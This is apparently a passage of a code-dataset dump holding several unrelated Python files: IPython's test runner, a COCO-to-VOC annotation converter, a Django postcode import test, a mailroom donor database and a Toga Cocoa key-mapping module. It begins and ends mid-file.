log.debug(\"Enabling attach ptvsd ...\")\n #\n # SEE https://github.com/microsoft/ptvsd#enabling-debugging\n #\n import ptvsd\n\n ptvsd.enable_attach(\n address=(\"0.0.0.0\", REMOTE_DEBUG_PORT), redirect_output=True\n ) # nosec\n\n except ImportError:\n log.exception(\"Unable to use remote debugging. 
ptvsd is not installed\")\n\n else:\n log.info(\"Remote debugging enabled: listening port %s\", REMOTE_DEBUG_PORT)\n else:\n log.debug(\"Booting without remote debugging since SC_BOOT_MODE=%s\", boot_mode)\n\n\n__all__ = [\"setup_remote_debugging\"]\n"} {"ext": "py", "sha": "1a302b90ca158ff107d25b7cdeffb5f9a5e3e5ba", "content": "# -*- encoding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n\nfrom slack_g_cal.parse import JSON, Datetime\n\n\nclass WitDatetimeContainer(JSON):\n \"\"\" Container wrapping datetime values from the Wit API \"\"\"\n def __init__(self, **dt_json):\n self.is_interval = dt_json['type'] == 'interval'\n # Get rid of values; we don't need this parameter\n dt_json.pop('values', None)\n if self.is_interval:\n from_, to_ = dt_json.pop('from'), dt_json.pop('to')\n self.dt_from = WitDatetime(date_input=from_.value, grain=from_.grain)\n self.dt_to = WitDatetime(date_input=to_.value, grain=to_.grain)\n else:\n self.date = WitDatetime(date_input=dt_json.pop('value'), grain=dt_json.pop('grain'))\n super(WitDatetimeContainer, self).__init__(**dt_json)\n\n\nclass WitDatetime(Datetime):\n def __init__(self, date_input, **dt_json):\n self.grain = dt_json.pop('grain')\n super(WitDatetime, self).__init__(date_input=date_input, **dt_json)\n\n def adjust_grain_by(self, adj_val):\n kwargs = {self.grain: getattr(self._datetime, self.grain) + adj_val}\n self._datetime = self._datetime.replace(**kwargs)\n"} {"ext": "py", "sha": "1a302b9a05e3fe2458365da32681c566fef33e7d", "content": "# -*- coding: utf-8 -*-\n\"\"\"IPython Test Suite Runner.\n\nThis module provides a main entry point to a user script to test IPython\nitself from the command line. There are two ways of running this script:\n\n1. With the syntax `iptest all`. This runs our entire test suite by\n calling this script (with different arguments) recursively. This\n causes modules and package to be tested in different processes, using nose\n or trial where appropriate.\n2. With the regular nose syntax, like `iptest -vvs IPython`. 
In this form\n the script simply calls nose, but with special command line flags and\n plugins loaded.\n\n\"\"\"\n\n# Copyright (c) IPython Development Team.\n# Distributed under the terms of the Modified BSD License.\n\n\nimport glob\nfrom io import BytesIO\nimport os\nimport os.path as path\nimport sys\nfrom threading import Thread, Lock, Event\nimport warnings\n\nimport nose.plugins.builtin\nfrom nose.plugins.xunit import Xunit\nfrom nose import SkipTest\nfrom nose.core import TestProgram\nfrom nose.plugins import Plugin\nfrom nose.util import safe_str\n\nfrom IPython import version_info\nfrom IPython.utils.py3compat import decode\nfrom IPython.utils.importstring import import_item\nfrom IPython.testing.plugin.ipdoctest import IPythonDoctest\nfrom IPython.external.decorators import KnownFailure, knownfailureif\n\npjoin = path.join\n\n\n# Enable printing all warnings raise by IPython's modules\nwarnings.filterwarnings('ignore', message='.*Matplotlib is building the font cache.*', category=UserWarning, module='.*')\nwarnings.filterwarnings('error', message='.*', category=ResourceWarning, module='.*')\nwarnings.filterwarnings('error', message=\".*{'config': True}.*\", category=DeprecationWarning, module='IPy.*')\nwarnings.filterwarnings('default', message='.*', category=Warning, module='IPy.*')\n\nwarnings.filterwarnings('error', message='.*apply_wrapper.*', category=DeprecationWarning, module='.*')\nwarnings.filterwarnings('error', message='.*make_label_dec', category=DeprecationWarning, module='.*')\nwarnings.filterwarnings('error', message='.*decorated_dummy.*', category=DeprecationWarning, module='.*')\nwarnings.filterwarnings('error', message='.*skip_file_no_x11.*', category=DeprecationWarning, module='.*')\nwarnings.filterwarnings('error', message='.*onlyif_any_cmd_exists.*', category=DeprecationWarning, module='.*')\n\nwarnings.filterwarnings('error', message='.*disable_gui.*', category=DeprecationWarning, module='.*')\n\nwarnings.filterwarnings('error', message='.*ExceptionColors global is deprecated.*', category=DeprecationWarning, module='.*')\n\n# Jedi older versions\nwarnings.filterwarnings(\n 'error', message='.*elementwise != comparison failed and.*', category=FutureWarning, module='.*')\n\nif version_info < (6,):\n # nose.tools renames all things from `camelCase` to `snake_case` which raise an\n # warning with the runner they also import from standard import library. 
(as of Dec 2015)\n # Ignore, let's revisit that in a couple of years for IPython 6.\n warnings.filterwarnings(\n 'ignore', message='.*Please use assertEqual instead', category=Warning, module='IPython.*')\n\nif version_info < (7,):\n warnings.filterwarnings('ignore', message='.*Completer.complete.*',\n category=PendingDeprecationWarning, module='.*')\nelse:\n warnings.warn(\n 'Completer.complete was pending deprecation and should be changed to Deprecated', FutureWarning)\n\n\n\n# ------------------------------------------------------------------------------\n# Monkeypatch Xunit to count known failures as skipped.\n# ------------------------------------------------------------------------------\ndef monkeypatch_xunit():\n try:\n knownfailureif(True)(lambda: None)()\n except Exception as e:\n KnownFailureTest = type(e)\n\n def addError(self, test, err, capt=None):\n if issubclass(err[0], KnownFailureTest):\n err = (SkipTest,) + err[1:]\n return self.orig_addError(test, err, capt)\n\n Xunit.orig_addError = Xunit.addError\n Xunit.addError = addError\n\n#-----------------------------------------------------------------------------\n# Check which dependencies are installed and greater than minimum version.\n#-----------------------------------------------------------------------------\ndef extract_version(mod):\n return mod.__version__\n\ndef test_for(item, min_version=None, callback=extract_version):\n \"\"\"Test to see if item is importable, and optionally check against a minimum\n version.\n\n If min_version is given, the default behavior is to check against the\n `__version__` attribute of the item, but specifying `callback` allows you to\n extract the value you are interested in. e.g::\n\n In [1]: import sys\n\n In [2]: from IPython.testing.iptest import test_for\n\n In [3]: test_for('sys', (2,6), callback=lambda sys: sys.version_info)\n Out[3]: True\n\n \"\"\"\n try:\n check = import_item(item)\n except (ImportError, RuntimeError):\n # GTK reports Runtime error if it can't be initialized even if it's\n # importable.\n return False\n else:\n if min_version:\n if callback:\n # extra processing step to get version to compare\n check = callback(check)\n\n return check >= min_version\n else:\n return True\n\n# Global dict where we can store information on what we have and what we don't\n# have available at test run time\nhave = {'matplotlib': test_for('matplotlib'),\n 'pygments': test_for('pygments'),\n 'sqlite3': test_for('sqlite3')}\n\n#-----------------------------------------------------------------------------\n# Test suite definitions\n#-----------------------------------------------------------------------------\n\ntest_group_names = ['core',\n 'extensions', 'lib', 'terminal', 'testing', 'utils',\n ]\n\nclass TestSection(object):\n def __init__(self, name, includes):\n self.name = name\n self.includes = includes\n self.excludes = []\n self.dependencies = []\n self.enabled = True\n \n def exclude(self, module):\n if not module.startswith('IPython'):\n module = self.includes[0] + \".\" + module\n self.excludes.append(module.replace('.', os.sep))\n \n def requires(self, *packages):\n self.dependencies.extend(packages)\n \n @property\n def will_run(self):\n return self.enabled and all(have[p] for p in self.dependencies)\n\n# Name -> (include, exclude, dependencies_met)\ntest_sections = {n:TestSection(n, ['IPython.%s' % n]) for n in test_group_names}\n\n\n# Exclusions and dependencies\n# ---------------------------\n\n# core:\nsec = test_sections['core']\nif not have['sqlite3']:\n 
sec.exclude('tests.test_history')\n sec.exclude('history')\nif not have['matplotlib']:\n sec.exclude('pylabtools'),\n sec.exclude('tests.test_pylabtools')\n\n# lib:\nsec = test_sections['lib']\nsec.exclude('kernel')\nif not have['pygments']:\n sec.exclude('tests.test_lexers')\n# We do this unconditionally, so that the test suite doesn't import\n# gtk, changing the default encoding and masking some unicode bugs.\nsec.exclude('inputhookgtk')\n# We also do this unconditionally, because wx can interfere with Unix signals.\n# There are currently no tests for it anyway.\nsec.exclude('inputhookwx')\n# Testing inputhook will need a lot of thought, to figure out\n# how to have tests that don't lock up with the gui event\n# loops in the picture\nsec.exclude('inputhook')\n\n# testing:\nsec = test_sections['testing']\n# These have to be skipped on win32 because they use echo, rm, cd, etc.\n# See ticket https://github.com/ipython/ipython/issues/87\nif sys.platform == 'win32':\n sec.exclude('plugin.test_exampleip')\n sec.exclude('plugin.dtexample')\n\n# don't run jupyter_console tests found via shim\ntest_sections['terminal'].exclude('console')\n\n# extensions:\nsec = test_sections['extensions']\n# This is deprecated in favour of rpy2\nsec.exclude('rmagic')\n# autoreload does some strange stuff, so move it to its own test section\nsec.exclude('autoreload')\nsec.exclude('tests.test_autoreload')\ntest_sections['autoreload'] = TestSection('autoreload',\n ['IPython.extensions.autoreload', 'IPython.extensions.tests.test_autoreload'])\ntest_group_names.append('autoreload')\n\n\n#-----------------------------------------------------------------------------\n# Functions and classes\n#-----------------------------------------------------------------------------\n\ndef check_exclusions_exist():\n from IPython.paths import get_ipython_package_dir\n from warnings import warn\n parent = os.path.dirname(get_ipython_package_dir())\n for sec in test_sections:\n for pattern in sec.exclusions:\n fullpath = pjoin(parent, pattern)\n if not os.path.exists(fullpath) and not glob.glob(fullpath + '.*'):\n warn(\"Excluding nonexistent file: %r\" % pattern)\n\n\nclass ExclusionPlugin(Plugin):\n \"\"\"A nose plugin to effect our exclusions of files and directories.\n \"\"\"\n name = 'exclusions'\n score = 3000 # Should come before any other plugins\n \n def __init__(self, exclude_patterns=None):\n \"\"\"\n Parameters\n ----------\n\n exclude_patterns : sequence of strings, optional\n Filenames containing these patterns (as raw strings, not as regular\n expressions) are excluded from the tests.\n \"\"\"\n self.exclude_patterns = exclude_patterns or []\n super(ExclusionPlugin, self).__init__()\n\n def options(self, parser, env=os.environ):\n Plugin.options(self, parser, env)\n \n def configure(self, options, config):\n Plugin.configure(self, options, config)\n # Override nose trying to disable plugin.\n self.enabled = True\n \n def wantFile(self, filename):\n \"\"\"Return whether the given filename should be scanned for tests.\n \"\"\"\n if any(pat in filename for pat in self.exclude_patterns):\n return False\n return None\n\n def wantDirectory(self, directory):\n \"\"\"Return whether the given directory should be scanned for tests.\n \"\"\"\n if any(pat in directory for pat in self.exclude_patterns):\n return False\n return None\n\n\nclass StreamCapturer(Thread):\n daemon = True # Don't hang if main thread crashes\n started = False\n def __init__(self, echo=False):\n super(StreamCapturer, self).__init__()\n self.echo = echo\n 
self.streams = []\n self.buffer = BytesIO()\n self.readfd, self.writefd = os.pipe()\n self.buffer_lock = Lock()\n self.stop = Event()\n\n def run(self):\n self.started = True\n\n while not self.stop.is_set():\n chunk = os.read(self.readfd, 1024)\n\n with self.buffer_lock:\n self.buffer.write(chunk)\n if self.echo:\n sys.stdout.write(decode(chunk))\n\n os.close(self.readfd)\n os.close(self.writefd)\n\n def reset_buffer(self):\n with self.buffer_lock:\n self.buffer.truncate(0)\n self.buffer.seek(0)\n\n def get_buffer(self):\n with self.buffer_lock:\n return self.buffer.getvalue()\n\n def ensure_started(self):\n if not self.started:\n self.start()\n\n def halt(self):\n \"\"\"Safely stop the thread.\"\"\"\n if not self.started:\n return\n\n self.stop.set()\n os.write(self.writefd, b'\\0') # Ensure we're not locked in a read()\n self.join()\n\nclass SubprocessStreamCapturePlugin(Plugin):\n name='subprocstreams'\n def __init__(self):\n Plugin.__init__(self)\n self.stream_capturer = StreamCapturer()\n self.destination = os.environ.get('IPTEST_SUBPROC_STREAMS', 'capture')\n # This is ugly, but distant parts of the test machinery need to be able\n # to redirect streams, so we make the object globally accessible.\n nose.iptest_stdstreams_fileno = self.get_write_fileno\n\n def get_write_fileno(self):\n if self.destination == 'capture':\n self.stream_capturer.ensure_started()\n return self.stream_capturer.writefd\n elif self.destination == 'discard':\n return os.open(os.devnull, os.O_WRONLY)\n else:\n return sys.__stdout__.fileno()\n \n def configure(self, options, config):\n Plugin.configure(self, options, config)\n # Override nose trying to disable plugin.\n if self.destination == 'capture':\n self.enabled = True\n \n def startTest(self, test):\n # Reset log capture\n self.stream_capturer.reset_buffer()\n \n def formatFailure(self, test, err):\n # Show output\n ec, ev, tb = err\n captured = self.stream_capturer.get_buffer().decode('utf-8', 'replace')\n if captured.strip():\n ev = safe_str(ev)\n out = [ev, '>> begin captured subprocess output <<',\n captured,\n '>> end captured subprocess output <<']\n return ec, '\\n'.join(out), tb\n\n return err\n \n formatError = formatFailure\n \n def finalize(self, result):\n self.stream_capturer.halt()\n\n\ndef run_iptest():\n \"\"\"Run the IPython test suite using nose.\n\n This function is called when this script is **not** called with the form\n `iptest all`. It simply calls nose with appropriate command line flags\n and accepts all of the standard nose arguments.\n \"\"\"\n # Apply our monkeypatch to Xunit\n if '--with-xunit' in sys.argv and not hasattr(Xunit, 'orig_addError'):\n monkeypatch_xunit()\n\n arg1 = sys.argv[1]\n if arg1 in test_sections:\n section = test_sections[arg1]\n sys.argv[1:2] = section.includes\n elif arg1.startswith('IPython.') and arg1[8:] in test_sections:\n section = test_sections[arg1[8:]]\n sys.argv[1:2] = section.includes\n else:\n section = TestSection(arg1, includes=[arg1])\n \n\n argv = sys.argv + [ '--detailed-errors', # extra info in tracebacks\n # We add --exe because of setuptools' imbecility (it\n # blindly does chmod +x on ALL files). Nose does the\n # right thing and it tries to avoid executables,\n # setuptools unfortunately forces our hand here. 
This\n # has been discussed on the distutils list and the\n # setuptools devs refuse to fix this problem!\n '--exe',\n ]\n if '-a' not in argv and '-A' not in argv:\n argv = argv + ['-a', '!crash']\n\n if nose.__version__ >= '0.11':\n # I don't fully understand why we need this one, but depending on what\n # directory the test suite is run from, if we don't give it, 0 tests\n # get run. Specifically, if the test suite is run from the source dir\n # with an argument (like 'iptest.py IPython.core', 0 tests are run,\n # even if the same call done in this directory works fine). It appears\n # that if the requested package is in the current dir, nose bails early\n # by default. Since it's otherwise harmless, leave it in by default\n # for nose >= 0.11, though unfortunately nose 0.10 doesn't support it.\n argv.append('--traverse-namespace')\n\n plugins = [ ExclusionPlugin(section.excludes), KnownFailure(),\n SubprocessStreamCapturePlugin() ]\n \n # we still have some vestigial doctests in core\n if (section.name.startswith(('core', 'IPython.core', 'IPython.utils'))):\n plugins.append(IPythonDoctest())\n argv.extend([\n '--with-ipdoctest',\n '--ipdoctest-tests',\n '--ipdoctest-extension=txt',\n ])\n\n \n # Use working directory set by parent process (see iptestcontroller)\n if 'IPTEST_WORKING_DIR' in os.environ:\n os.chdir(os.environ['IPTEST_WORKING_DIR'])\n \n # We need a global ipython running in this process, but the special\n # in-process group spawns its own IPython kernels, so for *that* group we\n # must avoid also opening the global one (otherwise there's a conflict of\n # singletons). Ultimately the solution to this problem is to refactor our\n # assumptions about what needs to be a singleton and what doesn't (app\n # objects should, individual shells shouldn't). 
But for now, this\n # workaround allows the test suite for the inprocess module to complete.\n if 'kernel.inprocess' not in section.name:\n from IPython.testing import globalipapp\n globalipapp.start_ipython()\n\n # Now nose can run\n TestProgram(argv=argv, addplugins=plugins)\n\nif __name__ == '__main__':\n run_iptest()\n"} {"ext": "py", "sha": "1a302bfb759b8043e0cff31548f78d641a922257", "content": "#DateTimeExample1.py\r\nfrom datetime import *\r\n\r\n#Will print current date and time \r\nprint(\"Current Date Time : \",datetime.now())\r\n\r\n"} {"ext": "py", "sha": "1a302d3e780cbfdb4a4eee3fee3214deb23994e4", "content": "import os\nfrom io import StringIO\nfrom django.contrib.gis.geos import Point\nfrom django.test import TestCase\nfrom uk_geo_utils.models import Onspd\nfrom uk_geo_utils.management.commands.import_onspd import Command\n\n\nclass OnsudImportTest(TestCase):\n\n def test_import_onspd(self):\n # check table is empty before we start\n self.assertEqual(0, Onspd.objects.count())\n\n # path to file we're going to import\n csv_path = os.path.abspath(\n os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n '../fixtures/onspd'\n )\n )\n\n cmd = Command()\n\n # supress output\n out = StringIO()\n cmd.stdout = out\n\n # import data\n opts = {\n 'path': csv_path,\n }\n cmd.handle(**opts)\n\n # ensure all our tasty data has been imported\n self.assertEqual(4, Onspd.objects.count())\n\n # row with valid grid ref should have valid Point() location\n al11aa = Onspd.objects.filter(pcds=\"AL1 1AA\")[0]\n self.assertEqual(Point(-0.341337, 51.749084, srid=4326), al11aa.location)\n\n # row with invalid grid ref should have NULL location\n im11aa = Onspd.objects.filter(pcds=\"IM1 1AA\")[0]\n self.assertIsNone(im11aa.location)\n"} {"ext": "py", "sha": "1a302da4c6f30789d8399841111880c8b91a2e66", "content": "#!/usr/bin/env python\n# Copyright 2019 Xilinx Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport os\nimport json\nimport argparse\nimport shutil\n\narg_parser = argparse.ArgumentParser(description=\"This is a script to convert coco anntations to voc-like annotations.\")\narg_parser.add_argument('-ti', '--train_images', type=str, default=\"./coco2014/train2014\", help='where to put coco2014 train images.')\narg_parser.add_argument('-vi', '--val_images', type=str, default='./coco2014/val2014', help='where to put coco2014 val images.')\narg_parser.add_argument('-ta', '--train_anno', type=str, default='./coco2014/instances_train2014.json', help='where to put cooc2014 train set annotations.')\narg_parser.add_argument('-va', '--val_anno', type=str, default='./coco2014/instances_val2014.json', help='where to put coco2014 val set annotations')\narg_parser.add_argument('-tlf', '--tran_list_file', type=str, default='./coco2014/train2014.txt', help='image list for training')\narg_parser.add_argument('-vlf', '--val_list_file', type=str, default='./coco2014/val2014.txt', help='image list for evalution.')\narg_parser.add_argument('-ai', '--all_images', type=str, 
default='./coco2014/Images', help='where to put all images.')\narg_parser.add_argument('-aa', '--all_anno', type=str, default='./coco2014/Annotations', help='where to put all annotations.')\nargs = arg_parser.parse_args()\n\n'''How to organize coco dataset folder:\n inputs:\n coco2014/\n |->train2014/\n |->val2014/\n |->instances_train2014.json\n |->instances_val2014.json\n\noutputs:\n coco2014/\n |->Annotations/\n |->Images/\n |->train2014.txt\n |->val2014.txt\n'''\n\ndef convert_images_coco2voc(args):\n assert os.path.exists(args.train_images)\n assert os.path.exists(args.val_images)\n os.system('mv ' + args.train_images + ' ' + args.all_images)\n imagename_list = os.listdir(args.val_images)\n for imagename in imagename_list:\n shutil.copy(os.path.join(args.val_images, imagename), args.all_images) \n os.system('rm -r ' + args.val_images)\n\ndef generate_cid_name(json_object):\n id2name_dict = {}\n for ind, category_info in enumerate(json_object['categories']):\n id2name_dict[category_info['id']] = category_info['name']\n return id2name_dict\n\ndef generate_image_dict(json_object): \n id2image_dict = {}\n for ind, image_info in enumerate(json_object['images']):\n id2image_dict[image_info['id']] = image_info['file_name']\n return id2image_dict\n\ndef generate_annotation_files(json_object, annotation_path, id2image_dict, id2name, image_list_file):\n if not os.path.exists(annotation_path):\n os.mkdir(annotation_path)\n f_image = open(image_list_file, 'w')\n all_images_name = []\n for ind, anno_info in enumerate(json_object['annotations']):\n print('preprocess: {}'.format(ind))\n category_id = anno_info['category_id']\n cls_name = id2name[category_id]\n if cls_name != \"person\":\n continue \n image_id = anno_info['image_id']\n image_name = id2image_dict[image_id]\n bbox = anno_info['bbox']\n bbox[2] = bbox[0] + bbox[2]\n bbox[3] = bbox[3] + bbox[1]\n bbox_str = ' '.join([str(int(x)) for x in bbox])\n with open(os.path.join(annotation_path, image_name.split('.')[0] + '.txt'), 'a') as f_anno:\n f_anno.writelines(image_name.split('.')[0] + \" \" + cls_name + \" \" + bbox_str + \"\\n\")\n if image_name not in all_images_name:\n all_images_name.append(image_name)\n for image_name in all_images_name: \n f_image.writelines(image_name.split('.')[0] + \"\\n\")\n f_image.close() \n \ndef convert_anno_coco2voc(coco_anno_file, image_list_file, all_anno_path):\n with open(coco_anno_file, 'r') as f_ann:\n line = f_ann.readlines()\n json_object = json.loads(line[0])\n id2name = generate_cid_name(json_object)\n id2image_dict = generate_image_dict(json_object)\n generate_annotation_files(json_object, all_anno_path, id2image_dict, id2name, image_list_file)\n\ndef convert_anno_all(args):\n convert_anno_coco2voc(args.train_anno, args.tran_list_file, args.all_anno)\n convert_anno_coco2voc(args.val_anno, args.val_list_file, args.all_anno)\n\nif __name__ == \"__main__\":\n convert_anno_all(args)\n convert_images_coco2voc(args)\n"} {"ext": "py", "sha": "1a302defb66f0280aa78784e4c2a5f022f25518d", "content": "#!/usr/bin/env python\n\"\"\"\nmodels for the mailroom program.\n\nThis is where the program logic is.\n\nThis version has been made Object Oriented.\n\"\"\"\n\n# handy utility to make pretty printing easier\nfrom textwrap import dedent\nfrom pathlib import Path\n\nimport json_save.json_save_dec as js\nimport json\n\nfrom . 
import data_dir\n\n\n@js.json_save\nclass Donor:\n \"\"\"\n class to hold the information about a single donor\n \"\"\"\n name = js.String()\n donations = js.List()\n\n # reference to the DB its in -- this will be set in the instance\n # when added to the DonorDB\n _donor_db = None\n\n def __init__(self, name, donations=None):\n \"\"\"\n create a new Donor object\n\n :param name: the full name of the donor\n\n :param donations=None: iterable of past donations\n \"\"\"\n\n self.norm_name = self.normalize_name(name)\n self.name = name.strip()\n if donations is None:\n self.donations = []\n else:\n self.donations = list(donations)\n\n def __str__(self):\n msg = (f\"Donor: {self.name}, with {self.num_donations:d} \"\n f\"donations, totaling: ${self.total_donations:.2f}\")\n return msg\n\n def mutating(method):\n \"\"\"\n Decorator that saves the DB when a change is made\n\n It should be applied to all mutating methods, so the\n data will be saved whenever it's been changed.\n\n NOTE: This requires that the donor object is in a DonorDB.\n \"\"\"\n\n # note that this is expecting to decorate a method\n # so self will be the first argument\n def wrapped(self, *args, **kwargs):\n print(\"wrapped method called\")\n print(self)\n print(self._donor_db)\n res = method(self, *args, **kwargs)\n if self._donor_db is not None:\n self._donor_db.save()\n return res\n return wrapped\n\n @staticmethod\n def normalize_name(name):\n \"\"\"\n return a normalized version of a name to use as a comparison key\n\n simple enough to not be in a method now, but maybe you'd want to make it fancier later.\n \"\"\"\n return name.lower().strip()\n\n @property\n def last_donation(self):\n \"\"\"\n The most recent donation made\n \"\"\"\n try:\n return self.donations[-1]\n except IndexError:\n return None\n\n @property\n def total_donations(self):\n return sum(self.donations)\n\n @property\n def num_donations(self):\n return len(self.donations)\n\n @property\n def average_donation(self):\n return self.total_donations / self.num_donations\n\n @mutating\n def add_donation(self, amount):\n \"\"\"\n add a new donation\n \"\"\"\n print(\"add_donation called\")\n amount = float(amount)\n if amount <= 0.0:\n raise ValueError(\"Donation must be greater than zero\")\n self.donations.append(amount)\n\n def gen_letter(self):\n \"\"\"\n Generate a thank you letter for the donor\n\n :param: donor tuple\n\n :returns: string with letter\n\n note: This doesn't actually write to a file -- that's a separate\n function. 
This makes it more flexible and easier to test.\n \"\"\"\n return dedent('''Dear {0:s},\n\n Thank you for your very kind donation of ${1:.2f}.\n It will be put to very good use.\n\n Sincerely,\n -The Team\n '''.format(self.name, self.last_donation)\n )\n\n\n@js.json_save\nclass DonorDB:\n \"\"\"\n Encapsulation of the entire database of donors and data associated with them.\n \"\"\"\n # specify a json_save dict as the data structure for the data.\n donor_data = js.Dict()\n\n _frozen = False\n\n def __init__(self, donors=None, db_file=None):\n \"\"\"\n Initialize a new donor database\n\n :param donors=None: iterable of Donor objects\n\n :param db_file=None: path to file to store the datbase in.\n if None, the data will be stored in the\n package data_dir\n \"\"\"\n if db_file is None:\n self.db_file = data_dir / \"mailroom_data.json\"\n else:\n self.db_file = Path(db_file)\n\n self.donor_data = {}\n\n if donors is not None:\n # you can set _frozen so that it won't save on every change.\n self._frozen = True\n for d in donors:\n self.add_donor(d)\n self.save # save resets _frozen\n\n def mutating(method):\n \"\"\"\n Decorator that saves the DB when a change is made\n\n It should be applied to all mutating methods, so the\n data will be saved whenever it's been changed.\n\n NOTE: This is not very efficient -- it will re-write\n the entire file each time.\n \"\"\"\n\n # note that this is expecting to decorate a method\n # so self will be the first argument\n def wrapped(self, *args, **kwargs):\n res = method(self, *args, **kwargs)\n if not self._frozen:\n self.save()\n return res\n return wrapped\n\n @classmethod\n def load_from_file(cls, filename):\n \"\"\"\n loads a donor database from a raw json file\n NOTE: This is not a json_save format file!\n -- it is a simpler, less flexible format.\n \"\"\"\n with open(filename) as infile:\n donors = json.load(infile)\n db = cls([Donor(*d) for d in donors])\n return db\n\n @classmethod\n def load(cls, filepath):\n \"\"\"\n loads a donor database from a json_save format file.\n \"\"\"\n with open(filepath) as jsfile:\n db = js.from_json(jsfile)\n db.db_file = filepath\n\n def save(self):\n \"\"\"\n Save the data to a json_save file\n \"\"\"\n # if explicitly called, you want to do it!\n self._frozen = False\n with open(self.db_file, 'w') as db_file:\n self.to_json(db_file)\n\n @property\n def donors(self):\n \"\"\"\n an iterable of all the donors\n \"\"\"\n return self.donor_data.values()\n\n def list_donors(self):\n \"\"\"\n creates a list of the donors as a string, so they can be printed\n\n Not calling print from here makes it more flexible and easier to\n test\n \"\"\"\n listing = [\"Donor list:\"]\n for donor in self.donors:\n listing.append(donor.name)\n return \"\\n\".join(listing)\n\n def find_donor(self, name):\n \"\"\"\n find a donor in the donor db\n\n :param: the name of the donor\n\n :returns: The donor data structure -- None if not in the self.donor_data\n \"\"\"\n return self.donor_data.get(Donor.normalize_name(name))\n\n @mutating\n def add_donor(self, donor):\n \"\"\"\n Add a new donor to the donor db\n\n :param donor: A Donor instance, or the name of the donor\n\n :returns: The new or existing Donor object\n \"\"\"\n\n if not isinstance(donor, Donor):\n donor = Donor(donor)\n self.donor_data[donor.norm_name] = donor\n donor._donor_db = self\n return donor\n\n @staticmethod\n def sort_key(item):\n # used to sort on name in self.donor_data\n return item[1]\n\n def generate_donor_report(self):\n \"\"\"\n Generate the report of the donors 
and amounts donated.\n\n :returns: the donor report as a string.\n \"\"\"\n # First, reduce the raw data into a summary list view\n report_rows = []\n for donor in self.donor_data.values():\n name = donor.name\n gifts = donor.donations\n total_gifts = donor.total_donations\n num_gifts = len(gifts)\n avg_gift = donor.average_donation\n report_rows.append((name, total_gifts, num_gifts, avg_gift))\n\n # sort the report data\n report_rows.sort(key=self.sort_key)\n report = []\n report.append(\"{:25s} | {:11s} | {:9s} | {:12s}\".format(\"Donor Name\",\n \"Total Given\",\n \"Num Gifts\",\n \"Average Gift\"))\n report.append(\"-\" * 66)\n for row in report_rows:\n report.append(\"{:25s} ${:10.2f} {:9d} ${:11.2f}\".format(*row))\n return \"\\n\".join(report)\n\n def save_letters_to_disk(self):\n \"\"\"\n make a letter for each donor, and save it to disk.\n \"\"\"\n print(\"Saving letters:\")\n for donor in self.donor_data.values():\n print(\"donor:\", donor.name)\n letter = donor.gen_letter()\n # I don't like spaces in filenames...\n filename = donor.name.replace(\" \", \"_\") + \".txt\"\n open(filename, 'w').write(letter)\n"} {"ext": "py", "sha": "1a302e27e1fa1d06835c690f86b03d4b5266920b", "content": "from toga import Key\n\nfrom toga_cocoa.libs import (\n NSEventModifierFlagCapsLock,\n NSEventModifierFlagShift,\n NSEventModifierFlagControl,\n NSEventModifierFlagOption,\n NSEventModifierFlagCommand,\n)\n\n######################################################################\n# Utilities to convert Cocoa constants to Toga ones\n######################################################################\n\ndef modified_key(key, shift=None):\n def mod_fn(modifierFlags):\n if modifierFlags & NSEventModifierFlagShift:\n return shift\n return key\n return mod_fn\n\n\ndef toga_key(event):\n \"\"\"Convert a Cocoa NSKeyEvent into a Toga event.\"\"\"\n key = {\n 0: Key.A,\n 1: Key.S,\n 2: Key.D,\n 3: Key.F,\n 4: Key.H,\n 5: Key.G,\n 6: Key.Z,\n 7: Key.X,\n 8: Key.C,\n 9: Key.V,\n 11: Key.B,\n 12: Key.Q,\n 13: Key.W,\n 14: Key.E,\n 15: Key.R,\n 16: Key.Y,\n 17: Key.T,\n 18: modified_key(Key._1, shift=Key.EXCLAMATION)(event.modifierFlags),\n 19: modified_key(Key._2, shift=Key.AT)(event.modifierFlags),\n 20: modified_key(Key._3, shift=Key.HASH)(event.modifierFlags),\n 21: modified_key(Key._4, shift=Key.DOLLAR)(event.modifierFlags),\n 22: modified_key(Key._6, shift=Key.CARET)(event.modifierFlags),\n 23: modified_key(Key._5, shift=Key.PERCENT)(event.modifierFlags),\n 24: modified_key(Key.PLUS, shift=Key.EQUAL)(event.modifierFlags),\n 25: modified_key(Key._9, shift=Key.OPEN_PARENTHESIS)(event.modifierFlags),\n 26: modified_key(Key._7, shift=Key.AND)(event.modifierFlags),\n 27: modified_key(Key.MINUS, shift=Key.UNDERSCORE)(event.modifierFlags),\n 28: modified_key(Key._8, shift=Key.ASTERISK)(event.modifierFlags),\n 29: modified_key(Key._0, shift=Key.CLOSE_PARENTHESIS)(event.modifierFlags),\n 30: Key.CLOSE_BRACKET,\n 31: Key.O,\n 32: Key.U,\n 33: Key.OPEN_BRACKET,\n 34: Key.I,\n 35: Key.P,\n 36: Key.ENTER,\n 37: Key.L,\n 38: Key.J,\n 39: modified_key(Key.QUOTE, shift=Key.DOUBLE_QUOTE)(event.modifierFlags),\n 40: Key.K,\n 41: modified_key(Key.COLON, shift=Key.SEMICOLON)(event.modifierFlags),\n 42: Key.BACKSLASH,\n 43: modified_key(Key.COMMA, shift=Key.LESS_THAN)(event.modifierFlags),\n 44: modified_key(Key.SLASH, shift=Key.QUESTION)(event.modifierFlags),\n 45: Key.N,\n 46: Key.M,\n 47: modified_key(Key.FULL_STOP, shift=Key.GREATER_THAN)(event.modifierFlags),\n 48: Key.TAB,\n 49: Key.SPACE,\n 50: 
